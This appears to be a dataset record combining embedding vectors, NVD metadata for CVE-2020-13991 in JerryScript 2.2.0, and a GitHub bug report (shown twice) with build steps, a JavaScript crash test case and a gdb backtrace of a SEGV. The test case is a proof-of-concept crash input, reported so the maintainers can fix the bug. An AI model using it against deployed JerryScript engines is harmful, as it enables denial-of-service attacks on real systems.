-0.002674071118235588, 0.0005818157806061208, 0.010754694230854511, -0.00588478147983551, -0.001476671313866973, -0.0011426405981183052, -0.002880330430343747, -0.00800943560898304, 0.012667613103985786, -0.0001801347389118746, 0.008870979771018028, 0.021085916087031364, 0.0208668801933527, 0.013156794011592865, 0.02012215554714203, 0.0076151699759066105, 0.0059906491078436375, 0.010155993513762951, -0.0031504754442721605, -0.011353394016623497, 0.02277979999780655, -0.016573764383792877, 0.006143974605947733, -0.006187782157212496, 0.013215203769505024, 0.0071770972572267056, -0.020355794578790665, -0.02793445996940136, -0.01676359586417675, 0.0033530842047184706, 0.0031066681258380413, 0.025525057688355446, -0.010725488886237144, 0.01750832051038742, 0.01073279045522213, 0.02234172634780407, -0.020910687744617462, 0.005976046901196241, 0.0015734124463051558, 0.008184664882719517, -0.0029259631410241127, -0.0127990348264575, -0.025101587176322937, -0.00015366781735792756, 0.0024805888533592224, -0.02809508517384529, -0.012726022861897945, 0.0072355070151388645, -0.020180566236376762, -0.011806068941950798, -0.01926061324775219, 0.006169529166072607, 0.01984471082687378, 0.005282430909574032, 0.03133682534098625, 0.0074180373921990395, -0.014909086748957634, -0.0026631192304193974, 0.00723915733397007, -0.004614369478076696, -0.016573764383792877, -0.001160893589258194, -0.007334073074162006, -0.021699219942092896, -0.01926061324775219, -0.01615029387176037, -0.018296850845217705, 0.01140450220555067, 0.014573230408132076, -0.01823844201862812, -0.011557827703654766, -0.011054043658077717, 0.00941857136785984, -0.00588478147983551, 0.02308645099401474, 0.007129639387130737, -0.014135157689452171, 0.0038331393152475357, -0.01997613161802292, 0.00015594945580232888, 0.008213870227336884, -0.0016299969283863902, -0.033322758972644806, -0.0018800635589286685, 0.011214670725166798, 0.017011838033795357, -0.02602154016494751, 0.011514020152390003, 0.005848275497555733, -0.012025105766952038, -0.016281716525554657, -0.0028712039347738028, -0.016106486320495605, 0.0266056377440691, 0.005140057299286127, 0.0002982091100420803, -0.003272770904004574, 0.0025627275463193655, 0.011667345650494099, -0.0027653363067656755, -0.009754426777362823, -0.02511618845164776, 0.002392974216490984, -0.02292582392692566, -0.01162353903055191, -0.015799835324287415, -0.005424804985523224, -0.007392482832074165, -0.010345825925469398, -0.009637607261538506, 0.010893416590988636, 0.009827438741922379, 0.01170385256409645, -0.03276786580681801, -0.012609203346073627, -0.0016537258634343743, 0.002026087837293744, 0.003039131872355938, 0.011776864528656006, 0.02056022919714451, -0.012769829481840134, -0.023582933470606804, -0.021129723638296127, 0.013726289384067059, 0.02634279429912567, -0.020414205268025398, -0.012163829058408737, 0.035659149289131165, -0.023904187604784966, 0.015902051702141762, 0.025992335751652718, 0.002747083082795143, 0.003573946189135313, 0.019012371078133583, -0.023728957399725914, 0.014653543941676617, -0.018180033192038536, 0.006337456870824099, 0.01124387513846159, 0.013368530198931694, 0.004650875926017761, -0.014631640166044235, -0.007001867983490229, 0.010484548285603523, -0.0027306554839015007, -0.015478582121431828, 0.02028278261423111, -0.0037710790056735277, 0.000668517779558897, -0.018442876636981964, 0.026518022641539574, 0.01692422293126583, 0.018924755975604057, 0.02543744258582592, -0.04985271394252777, 0.003862344194203615, 0.011338790878653526, 0.0007355976849794388, 0.005421154201030731, 0.0053444914519786835, 0.002821920672431588, 0.0026485167909413576, 0.002197666559368372, -0.0038367898669093847, 0.0048881652764976025, 0.000412975117797032, 0.012222238816320896, -0.006830289028584957, -0.00814815890043974, -0.0055343229323625565, 0.00802403874695301, 0.002104575978592038, 0.0008054155623540282, 0.011813370510935783, -0.004869912285357714, -0.00016929698176681995, -0.012769829481840134, -0.015084316022694111, -0.018180033192038536, 0.0393681675195694, 0.008666545152664185, 0.002559076761826873, -0.03659370169043541, 0.010090283118188381, 0.012923155911266804, 0.017172465100884438, -0.002084497595205903, 0.014492916874587536, -0.011411803774535656, -0.03922214359045029, 0.006622204557061195, -0.01736229658126831, 0.007213603239506483, -0.015770630910992622, 0.007761194370687008, -0.0016044426010921597, -0.005366395227611065, 0.004095983225852251, 0.004939273931086063, -0.014719255268573761, -0.0017586807953193784, 0.007965628989040852, -0.006826638709753752, 0.00492467125877738, 0.008425605483353138, 0.02837253175675869, 0.02840173803269863, 0.004464694764465094, -0.023568330332636833, 0.03411129117012024, -0.00606366153806448, -0.023787368088960648, -0.0022067930549383163, -0.02104211039841175, 0.02442987449467182, 0.00017534330254420638, -0.009031606838107109, -0.008688448928296566, -0.0010805802885442972, 0.009776330552995205, 0.014872580766677856, -0.0025061429478228092, 0.005234973039478064, 0.012915854342281818, -0.005709552206099033, 0.00029706829809583724, 0.016836607828736305, -0.016223305836319923, 0.02146558091044426, 0.005968745332211256, -0.003800283884629607, -0.0019877564627677202, 0.00917763076722622, 0.005256876815110445, 0.010236307047307491, -0.0075421580113470554, 0.00830878596752882, 0.01869111694395542, 0.006782831158488989, -0.0006009814678691328, 0.0034315723460167646, 0.003659735433757305, 0.028270315378904343, -0.005063394550234079, 0.014025639742612839, 0.004336923360824585, -0.008849075995385647, -0.020224373787641525, -0.009659511037170887, -0.007958327420055866, -0.026138359680771828, -0.019800903275609016, 0.008943991735577583, 0.0012402944266796112, -0.00040704288403503597, -0.003542915917932987, 0.022706788033246994, 0.004508501850068569, -0.011265778914093971, -0.0012576347216963768, -0.0019421239849179983, -0.015332557260990143, 0.016588367521762848, 0.00602350477129221, 0.0028346977196633816, 0.007658977527171373, -0.0015633732546120882, -0.016237908974289894, -0.020925290882587433, 0.0025736792013049126, -0.006775530055165291, 0.009141124784946442, -0.015478582121431828, -0.0003707649593707174, -0.006206035148352385, 0.005176563281565905, -0.0025499502662569284, 0.0015542467590421438, 0.0017240000888705254, 0.010462645441293716, 0.003880597185343504, -0.011521321721374989, 0.018311453983187675, -0.010462645441293716, 0.0002557707775849849, -0.0031431743409484625, -0.00010101919178850949, 0.020209770649671555, 0.03101557306945324, -0.016719788312911987, 0.015683015808463097, 0.014536724425852299, 0.007885315455496311, -0.002984372666105628, -0.006947108544409275, -0.006443324498832226, -0.0029241377487778664, -0.008841774426400661, 0.0018034008098766208, 0.004468345083296299, -0.012463178485631943, -0.01389421708881855, 0.02250235341489315, 0.010280114598572254, -0.0046472251415252686, 0.00393535615876317, -0.03355639800429344, 0.012485082261264324, 0.00794372521340847, 0.02438606694340706, -0.012448576278984547, 0.005180214066058397, -0.005855576600879431, 0.012382864952087402, 0.013485349714756012, 0.005778913851827383, 0.00033494335366412997, -0.002723354147747159, 0.0024714621249586344, -0.017712755128741264, -0.013047276064753532, 0.0015661112265661359, 0.003121270565316081, 0.0020206121262162924, 0.01677819900214672, 0.021845243871212006, 0.0033877650275826454, -0.007512953132390976, -0.0020790216512978077, 0.01388691645115614, 0.008206568658351898, -0.01514272578060627, 0.002517094835639, -0.016836607828736305, 0.010039173997938633, -0.0011362520745024085, -0.01615029387176037, -0.008381797932088375, -0.0021721122320741415, 0.002294407691806555, 0.002832872560247779, 0.014069446362555027, -0.011433706618845463, 0.0032709455117583275, 0.010396934114396572, 0.03837519884109497, 0.011134357191622257, -0.0033640360925346613, 0.01330281887203455, 0.019757095724344254, -0.004395333118736744, -0.017741959542036057, -0.00948428176343441, -0.008615436963737011, 0.02190365269780159, -0.006052709650248289, 0.005121804308146238, -0.005935890134423971, 0.005764311645179987, -0.024327658116817474, 0.033322758972644806, 0.012163829058408737, 0.009557293727993965, 0.0169388260692358, 0.015639208257198334, -0.010557561181485653, -0.00867384672164917, -0.0009267983259633183, -0.011273080483078957, -0.0002607903734315187, -0.000483249343233183, 0.0019183949334546924, -0.00925794430077076, 0.021275749430060387, 0.02381657250225544, 0.017260078340768814, 0.0028036676812916994, 0.026999903842806816, 0.0076151699759066105, 0.015551594085991383, -0.0035648196935653687, -0.010002668015658855, 0.0010157818906009197, 0.01674899272620678, -0.0054686120711266994, 0.004939273931086063, -0.007107735611498356, 0.018442876636981964, 0.003855043090879917, -0.014361495152115822, 0.010258210822939873, -0.006297300569713116, 0.008768762461841106, -0.002801842289045453, 0.013069179840385914, 0.029876582324504852, 0.003701717359945178, -0.00808244850486517, 0.005516069941222668, 0.019041575491428375, 0.015522388741374016, -0.004526754841208458, 0.015069713816046715, -0.011287682689726353, 0.009374763816595078, 0.017975598573684692, -0.037995535880327225, 0.013251710683107376, 0.00015309741138480604, -0.011587033048272133, -0.012141925282776356, -0.0001463665976189077, -0.023626741021871567, 0.004077730234712362, -0.0009674113825894892, -0.0023820223286747932, -0.0008478538948111236, 0.007878013886511326, -0.015098918229341507, 0.0038331393152475357, 0.01087881438434124, -0.0005831847665831447, -0.0026941492687910795, 0.02291122078895569, 0.0015058761928230524, 0.014317688532173634, -0.028912821784615517, -0.013543758541345596, -0.01601887121796608, -0.006235240027308464, -0.005501467734575272, 0.005647492129355669, 0.001620870316401124, 0.00422375462949276, -0.010155993513762951, 0.0060344566591084, -0.01765434443950653, -0.001160893589258194, 0.0073523265309631824, 0.00853512343019247, -0.042288653552532196, -0.00024094019317999482, 0.0035483918618410826, 0.0012183907674625516, 0.020414205268025398, 0.0020954494830220938, -0.0027251795399934053, -0.022458545863628387, -0.026269782334566116, -0.006808385718613863, -0.003960910718888044, 0.0032490419689565897, -0.021538592875003815, -0.00962300505489111, -0.01604807749390602, 0.001598054077476263, -0.00547956395894289, -0.006917903665453196, 0.013310120441019535, -0.015697618946433067, 0.013375830836594105, 0.005253226030617952, 0.0009555468568578362, 0.026868481189012527, 0.02732115611433983, -0.007783098146319389, 0.009214136749505997, -0.004362477455288172, -0.0016728915506973863, 0.0034626026172190905, -0.009535390883684158, -0.009389366023242474, -0.013850410468876362, -0.0075494591146707535, -0.0018891900544986129, -0.01067438069730997, -0.004336923360824585, -0.020764663815498352, 0.016515355557203293, 0.016106486320495605, 0.0008569804485887289, -0.011309586465358734, -0.006425071507692337, -0.005892082583159208, 0.0179463941603899, -0.014076747931540012, -0.0003814886149484664, -0.0003552498819772154, -0.01263840775936842, 0.015843642875552177, -0.0057424078695476055, -0.00956459529697895, -0.019625673070549965, -0.011616237461566925, 0.01971328817307949, -0.005023237783461809, -0.02529141865670681, 0.008732256479561329, 0.013865012675523758, -0.017858779057860374, 0.01793179102241993, -0.010900718159973621, 0.012988866306841373, -0.014003735966980457, -0.005081647541373968, 0.021523989737033844, 0.0057935165241360664, -0.015332557260990143, 0.02263377420604229, 0.015931257978081703, -0.0008081535343080759, 0.003482680767774582, -0.020969096571207047, 0.0038367898669093847, -0.009075413458049297, -0.01733309030532837, 0.007082181051373482, -0.041237279772758484, -0.005968745332211256, -0.0001613112835912034, 0.0041251881048083305, -0.0062644449062645435, 0.001788798370398581, -0.014529423788189888, 0.0072428081184625626, -0.007717387285083532, -0.01221493724733591, 0.009725222364068031, 0.010645175352692604, -0.00727931410074234, -0.0004325971531216055, 0.006614903453737497, -0.0045158034190535545, -0.004201850853860378, 0.05151739344000816, -0.0003983727074228227, 0.007571362890303135, 0.004512152634561062, -0.007951025851070881, 0.005600034259259701, 0.00017271943215746433, 0.00275986036285758, -0.002736131427809596, -0.0017897110665217042, -0.014646243304014206, -0.0004567824362311512, 0.008651942946016788, -0.008542424999177456, -0.025335226207971573, -0.002537173219025135, 0.0076151699759066105, 0.0027069265488535166, -0.010688982903957367, -0.018019406124949455, 0.01644234172999859, -0.005917637143284082, 0.02691228874027729, -0.004734839778393507, 0.0054759131744503975, 0.009455077350139618, 0.00393535615876317, -0.035045843571424484, -0.01067438069730997, -0.007111385930329561, 0.006154926493763924, -0.006202384363859892, -0.010951826348900795, 0.00041776656871661544, 0.0076078688725829124, -0.01243397407233715, 0.012222238816320896, 0.027014505118131638, -0.03326434642076492, -0.017610536888241768, -0.0018572473200038075, -0.0009067200007848442, -0.012762528844177723, -0.0024075766559690237, -0.0010723663726821542, 0.02602154016494751, -0.01750832051038742, 0.04074079543352127, 0.005837323609739542, 0.030781934037804604, 0.0041908989660441875, 0.003928055055439472, -0.00019679064280353487, 0.017610536888241768, -0.007144241593778133, -0.009747126139700413, 0.01536176260560751, -0.003667036537081003, -0.024926356971263885, -0.024459078907966614, 0.001940298592671752, 0.00817006267607212, 0.0009747126023285091, 0.003312927670776844, -0.02381657250225544, 0.014865279197692871, 0.014814171008765697, 0.02000533603131771, -0.003623229218646884, 0.03437413275241852, -0.011068645864725113, -0.019070781767368317, 0.006293649785220623, -0.02603614330291748, -0.0012220413191244006, -0.025203803554177284, 0.0007721037836745381, -0.02336389757692814, 0.013675181195139885, 0.0013187824515625834, -0.006644108332693577, -0.01035312656313181, 0.0036378316581249237, 0.004570562392473221, 0.0019256961531937122, 0.013704385608434677, -0.013375830836594105, -0.012594601139426231, -0.006300950888544321, -0.012419371865689754, 0.015829039737582207, 0.006739024072885513, -0.006549192126840353, -0.02764241024851799, 0.010455343872308731, 0.005647492129355669, 0.007385181728750467, 0.03247581794857979, 0.0015086141647771, 0.00948428176343441, 0.015186533331871033, -0.01477766502648592, -0.002743432531133294, -0.009761728346347809, 0.011579731479287148, -0.02336389757692814, -0.000030887575121596456, -0.02279440127313137, -0.014544025994837284, -0.009214136749505997, 0.023144859820604324, 0.0011243874905630946, -0.011981298215687275, -0.00011830254516098648, 0.01469735149294138, 0.0009281673119403422, 0.011316887103021145, -0.015770630910992622, 0.021947460249066353, 0.01690961979329586, -0.010396934114396572, -0.0020753710996359587, 0.01926061324775219, -0.006742674857378006, -0.016544559970498085, -0.006676963530480862, -0.0028894569259136915, 0.013229806907474995, 0.018442876636981964, 0.0021246543619781733, 0.0016884065698832273, 0.004789598751813173, 0.0026284384075552225, 0.010988332331180573, 0.009192232973873615, -0.007826905697584152, -0.009046209044754505, 0.03305991366505623, -0.0023163112346082926, 0.0062644449062645435, 0.016690583899617195, 0.023933392018079758, 0.013273613527417183, 0.010937224142253399, -0.023013439029455185, 0.010046475566923618, 0.0037747295573353767, -0.01601887121796608, -0.010170596651732922, -0.0005334452143870294, 0.021436374634504318, 0.0066550602205097675, 0.01550778653472662, -0.009017003700137138, 0.009812836535274982, 0.00817006267607212, 0.0073523265309631824, 0.020355794578790665, -0.005851926282048225, 0.01575602777302265, 0.0050962502136826515, 0.009024305269122124, 0.005110852420330048, -0.019757095724344254, 0.023466113954782486, 0.00462897215038538, 0.0084694130346179, 0.0005407464341260493, 0.020662445574998856, -0.0018335182685405016, -0.014982098713517189, -0.001200137659907341, 0.01909998618066311, -0.00976902898401022, 0.018486684188246727, 0.008571629412472248, 0.020385000854730606, 0.023904187604784966, 0.023699752986431122, 0.009440474212169647, 0.008549725636839867, 0.007856110110878944, -0.013412336818873882, -0.0022122689988464117, 0.023042643442749977, -0.019757095724344254, -0.016573764383792877, -0.004862611182034016, 0.013879614882171154, 0.0045997672714293, 0.0050378404557704926, -0.008922087959945202, 0.012828239239752293, 0.023174066096544266, -0.01660296879708767, 0.01463894173502922, 0.019654877483844757, -0.002801842289045453, 0.0021301303058862686, 0.005322587676346302, 0.016792800277471542, -0.013594867661595345, 0.003986464813351631, -0.012098117731511593 ]
2,309
CVE-2020-13991
2020-09-24T23:15:13.540000
vm/opcodes.c in JerryScript 2.2.0 allows attackers to hijack the flow of control by controlling a register.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/googleprojectzero/fuzzilli#JerryScript" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3858" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3859" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3860" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/pull/3867" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3859
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision c09c2c5dd7144d97b8b32cc2697d5b04bb647e35 ###### Build platform Ubuntu 18.04 LTS ###### Build steps python tools/build.py --profile=es2015-subset --lto=off --error-messages=on --strip=off --compile-flag=-fsanitize=address ###### Test case ``` function main() { const v3 = {a:13.37,length:13.37}; const v6 = [13.37,13.37]; let v9 = 0; const v10 = v6.copyWithin(v9,8,2147483649); const v11 = -9007199254740993 == gc; const v12 = gc(...v11,...v3); } main(); ``` ###### Execution steps build/bin/jerry testcase.js ###### Output AddressSanitizer:DEADLYSIGNAL ###### Backtrace Program received signal SIGSEGV, Segmentation fault. 0x000000000053bd5f in jmem_pools_finalize () (gdb) bt ``` #0 0x000000000053bd5f in jmem_pools_finalize () #1 0x000000000053a7bb in jmem_finalize () #2 0x00000000004f2ba0 in main () ```
SEGV in jmem_pools_finalize
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3859/comments
0
2020-06-05T03:41:34
2020-06-06T16:39:42Z
https://github.com/jerryscript-project/jerryscript/issues/3859
631,287,983
3,859
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : SEGV in jmem_pools_finalize Issue date: --- start body --- ###### JerryScript revision c09c2c5dd7144d97b8b32cc2697d5b04bb647e35 ###### Build platform Ubuntu 18.04 LTS ###### Build steps python tools/build.py --profile=es2015-subset --lto=off --error-messages=on --strip=off --compile-flag=-fsanitize=address ###### Test case ``` function main() { const v3 = {a:13.37,length:13.37}; const v6 = [13.37,13.37]; let v9 = 0; const v10 = v6.copyWithin(v9,8,2147483649); const v11 = -9007199254740993 == gc; const v12 = gc(...v11,...v3); } main(); ``` ###### Execution steps build/bin/jerry testcase.js ###### Output AddressSanitizer:DEADLYSIGNAL ###### Backtrace Program received signal SIGSEGV, Segmentation fault. 0x000000000053bd5f in jmem_pools_finalize () (gdb) bt ``` #0 0x000000000053bd5f in jmem_pools_finalize () #1 0x000000000053a7bb in jmem_finalize () #2 0x00000000004f2ba0 in main () ``` --- end body ---
1,033
[ -0.020618468523025513, 0.006082303822040558, -0.007789680268615484, 0.007078574504703283, 0.0030862728599458933, -0.01816388964653015, -0.02681267261505127, 0.043200600892305374, -0.02886296808719635, 0.015333903022110462, -0.028068838641047478, 0.006251958664506674, 0.002138732932507992, 0.006331371609121561, 0.03081219270825386, 0.028920723125338554, -0.036298900842666626, -0.002700037555769086, 0.004530142992734909, -0.020214185118675232, 0.02587415650486946, -0.012612207792699337, -0.026264000684022903, 0.032111674547195435, -0.02495007961988449, -0.0007435932056978345, -0.018062816932797432, 0.012554452754557133, -0.007587538566440344, 0.012828787788748741, -0.02237999066710472, 0.00970280822366476, -0.01673445664346218, 0.027289148420095444, 0.02508002705872059, 0.025339923799037933, 0.03401758521795273, 0.046983540058135986, 0.005309833213686943, 0.005291784647852182, 0.00806401576846838, -0.019347863271832466, -0.022221164777874947, 0.021629177033901215, 0.016503438353538513, 0.05795695632696152, 0.048485167324543, -0.0017913016490638256, -0.04467334970831871, 0.010179285891354084, 0.028097717091441154, -0.002165805548429489, 0.019376739859580994, -0.05021781101822853, 0.017095424234867096, -0.012511136010289192, 0.027707871049642563, 0.01991097256541252, 0.02333294413983822, 0.005717726424336433, -0.002903984161093831, -0.00547226844355464, -0.02250993810594082, 0.02258213236927986, 0.029108425602316856, 0.05093974620103836, -0.02229335717856884, 0.009009750559926033, 0.0039850822649896145, 0.008511615917086601, -0.000647936831228435, -0.009616176597774029, 0.03009025752544403, 0.037944912910461426, -0.010258698835968971, -0.004620384890586138, 0.00826615747064352, 0.02486344799399376, -0.015868134796619415, -0.013492967933416367, -0.017008792608976364, 0.01952112652361393, -0.013211413286626339, 0.02321743406355381, 0.006880042143166065, -0.008764293044805527, -0.01145711075514555, -0.06185540556907654, 0.008013480342924595, -0.01634461246430874, -0.015333903022110462, 0.025830840691924095, -0.008533273823559284, 0.014251000247895718, 0.0047106267884373665, 0.00971002783626318, -0.03832031786441803, 0.008417763747274876, -0.04938036575913429, 0.003582603298127651, -0.018828069791197777, -0.005894600413739681, -0.01160149835050106, 0.015391658060252666, -0.0196221973747015, 0.030234644189476967, 0.008432202972471714, -0.013572380878031254, 0.04346049576997757, 0.10118643194437027, 0.011753104627132416, 0.01156540121883154, -0.0488605722784996, -0.014330413192510605, -0.012828787788748741, -0.01663338579237461, 0.01170256920158863, -0.02353508584201336, -0.008742635138332844, -0.013016491197049618, -0.046377114951610565, -0.021600300446152687, -0.02289978414773941, -0.01438816823065281, -0.020401887595653534, 0.012395626865327358, 0.017586341127753258, 0.007017209660261869, 0.007172425743192434, 0.004086153116077185, -0.0725400447845459, -0.04068826511502266, 0.0033190969843417406, -0.011305504478514194, 0.03112984448671341, -0.022163409739732742, -0.017788482829928398, 0.04871618375182152, -0.021297087892889977, -0.03728073090314865, -0.04447120800614357, -0.030234644189476967, 0.033728811889886856, -0.00372518552467227, -0.010439182631671429, -0.0009737100335769355, -0.03817593306303024, 0.03889786824584007, -0.01654675416648388, -0.014352071098983288, -0.01930454559624195, 0.037222977727651596, 0.023347383365035057, 0.04149683192372322, 0.016705580055713654, -0.020474081858992577, -0.005652752239257097, 0.052556879818439484, -0.01115389820188284, -0.005299004260450602, -0.03927327319979668, -0.016878843307495117, -0.013991103507578373, -0.023665035143494606, -0.05766817927360535, 0.013991103507578373, 0.00022154385806061327, 0.007053306791931391, 0.023477330803871155, 0.004739504307508469, -0.037338487803936005, 0.010135970078408718, 0.005410904064774513, 0.026668284088373184, -0.0285453163087368, -0.0036367482971400023, -0.003447240451350808, 0.020315255969762802, -0.01787511445581913, -0.02782338112592697, 0.017903992906212807, 0.013579600490629673, -0.02957046404480934, 0.0013761889422312379, -6.168879735923838e-7, -0.042565297335386276, 0.0212682094424963, -0.05556013062596321, 0.02177356369793415, -0.028530877083539963, 0.017095424234867096, -0.004833356011658907, -0.0023498989176005125, -0.005428952630609274, 0.036125633865594864, 0.02064734511077404, -0.00030140794115141034, -0.029325006529688835, -0.005226810462772846, -0.017918430268764496, 0.01341355498880148, -0.01942005567252636, -0.0236072801053524, -0.00960895698517561, -0.0023282410111278296, -0.023968247696757317, -0.006630974356085062, 0.004071714356541634, 0.006266397424042225, -0.00580074917525053, -0.007046087179332972, 0.0014826743863523006, 0.019160158932209015, -0.0363277792930603, -0.02957046404480934, 0.001176754361949861, 0.00033412061748094857, 0.020055359229445457, -0.03551920875906944, 0.00526290712878108, 0.028415368869900703, -0.015998084098100662, -0.031389739364385605, 0.01063410472124815, -0.049149345606565475, -0.02382386103272438, -0.006208642385900021, 0.026350634172558784, -0.04548191651701927, 0.033237896859645844, 0.023159680888056755, -0.014633625745773315, -0.011637594550848007, 0.005631094332784414, 0.05093974620103836, 0.01624354161322117, -0.018149450421333313, -0.009897731244564056, 0.033642180263996124, 0.01952112652361393, -0.002189268358051777, -0.008735415525734425, -0.05472268536686897, -0.04016847163438797, 0.028097717091441154, 0.021181577816605568, -0.04900496080517769, -0.020502958446741104, -0.004786429926753044, 0.012460600584745407, -0.019550004974007607, -0.032400451600551605, -0.022971976548433304, -0.03875347971916199, 0.0033190969843417406, 0.02352064847946167, -0.00670677749440074, 0.007544222287833691, -0.04178560897707939, 0.01910240389406681, 0.01139935664832592, 0.02056071348488331, -0.03808929771184921, 0.014828547835350037, 0.005291784647852182, 0.04594395309686661, -0.044009167701005936, 0.01674889586865902, 0.016922160983085632, -0.019492249935865402, 0.01757190190255642, -0.034248605370521545, -0.017210934311151505, 0.010648543946444988, -0.0029491051100194454, 0.0033281210344284773, 0.007248228881508112, 0.006573219783604145, -0.018929140642285347, 0.005840455647557974, 0.011341601610183716, 0.00007828484376659617, 0.02528216876089573, 0.028733018785715103, 0.006201423238962889, 0.009897731244564056, 0.04940924420952797, -0.030061380937695503, -0.010345330461859703, -0.023029731586575508, 0.005865723360329866, -0.01674889586865902, 0.0033714373130351305, -0.004331611096858978, 0.03485503047704697, 0.0013373849214985967, -0.013904470950365067, -0.0017606193432584405, -0.0016550363507121801, 0.007046087179332972, -0.0009511495591141284, -0.026336194947361946, 0.01032367255538702, 0.004714236594736576, -0.02313080243766308, -0.0000952616028371267, -0.00206653936766088, -0.004970523528754711, -0.0011641205055639148, -0.015622677281498909, 0.04938036575913429, -0.021845757961273193, -0.003662016009911895, -0.02320299670100212, 0.0026910132728517056, 0.0018472515512257814, 0.007688609417527914, -0.01397666521370411, -0.01901577226817608, 0.030783316120505333, -0.029772605746984482, -0.03358442336320877, -0.0491204671561718, 0.016185786575078964, 0.06093132868409157, -0.004678139928728342, -0.04097703844308853, 0.040832653641700745, -0.05093974620103836, 0.018958017230033875, 0.020373011007905006, -0.03144749626517296, -0.05313442647457123, 0.0016017936868593097, -0.035374823957681656, -0.020387448370456696, -0.0375983826816082, 0.04097703844308853, 0.036934204399585724, -0.02095055766403675, -0.034450747072696686, -0.00939237605780363, -0.03121647611260414, -0.003418362932279706, -0.013276387937366962, -0.008619905449450016, -0.02289978414773941, 0.019030211493372917, 0.024184828624129295, 0.0300036258995533, 0.0008356399484910071, 0.004768381826579571, 0.031187599524855614, -0.007537003140896559, 0.0445578396320343, -0.025715330615639687, -0.04825414717197418, -0.00567801995202899, 0.02145591378211975, -0.013117562048137188, 0.00817230623215437, -0.03745399788022041, 0.008554931730031967, -0.002441945718601346, 0.012438942678272724, -0.0070316484197974205, 0.01355794258415699, -0.010316453874111176, -0.022019023075699806, -0.003109735669568181, -0.007724706083536148, 0.03196728974580765, 0.0067537035793066025, 0.01043196301907301, 0.015637116506695747, -0.05065097287297249, 0.01448201946914196, -0.001211046241223812, -0.020199745893478394, 0.019145719707012177, 0.004187223967164755, 0.01094453688710928, 0.006901700049638748, -0.027606800198554993, 0.020199745893478394, 0.013651793822646141, -0.009775002487003803, 0.033555544912815094, -0.026321755722165108, -0.02034413255751133, -0.011002291925251484, 0.028415368869900703, -0.04655037820339203, -0.03009025752544403, -0.0225965715944767, 0.04054388031363487, 0.023477330803871155, -0.0004642945423256606, 0.019492249935865402, -0.05498258396983147, -0.0034905564971268177, -0.016720019280910492, 0.010901221074163914, -0.013095904141664505, 0.004259417299181223, 0.011182775720953941, 0.00610757153481245, -0.032111674547195435, 0.006410784088075161, -0.00745037104934454, 0.032804735004901886, -0.031274233013391495, -0.033757686614990234, 0.012727716937661171, 0.02845868468284607, 0.02279871329665184, 0.02464686706662178, -0.04487549141049385, -0.05454942211508751, 0.022668763995170593, -0.03832031786441803, -0.012337871827185154, 0.039244394749403, 0.01901577226817608, -0.00919023435562849, 0.005259297788143158, -0.04034173861145973, 0.016272418200969696, 0.013731206767261028, -0.03338228166103363, -0.04600170999765396, 0.017384199425578117, 0.017528586089611053, 0.04805200546979904, 0.014575870707631111, -0.02145591378211975, -0.0212682094424963, -0.04369151592254639, -0.009630614891648293, -0.02864638715982437, 0.015637116506695747, -0.018452662974596024, -0.03462401032447815, -0.022943099960684776, 0.013918910175561905, -0.04346049576997757, -0.0429118275642395, -0.003761282190680504, 0.01324751041829586, 0.002954519586637616, 0.012496697716414928, 0.02874745801091194, 0.00072238635038957, -0.00413668854162097, 0.02372279018163681, -0.016676701605319977, -0.01940561644732952, 0.01663338579237461, 0.0027235003653913736, 0.01973770745098591, 0.021325964480638504, -0.006345809902995825, -0.0022055120207369328, 0.0015341122634708881, -0.04623272642493248, 0.040630511939525604, 0.007537003140896559, -0.005461439490318298, -0.009471789002418518, -0.01858261041343212, 0.034277480095624924, 0.010504156351089478, 0.007890751585364342, 0.009904950857162476, -0.04903383553028107, -0.013471310026943684, 0.0004760260053444654, -0.0028408148791640997, 0.023852737620472908, -0.027664555236697197, -0.0037287950981408358, 0.009067505598068237, -0.02855975553393364, 0.05515584722161293, 0.012807129882276058, 0.005331491120159626, 0.03234269469976425, 0.025816401466727257, -0.014525335282087326, 0.018149450421333313, 0.022567693144083023, 0.018972456455230713, -0.06301049888134003, -0.03930215165019035, -0.0025033100973814726, -0.005793529562652111, -0.02649502083659172, -0.03670318424701691, 0.01654675416648388, -0.0011812663869932294, 0.004385756328701973, -0.06133561208844185, 0.025022272020578384, 0.024488041177392006, 0.004385756328701973, -0.03153412789106369, -0.03222718462347984, 0.03341116011142731, -0.018553733825683594, -0.023087486624717712, 0.00765251275151968, -0.05567564070224762, -0.013622916303575039, -0.03387319669127464, -0.014121051877737045, -0.003761282190680504, 0.0014700405299663544, 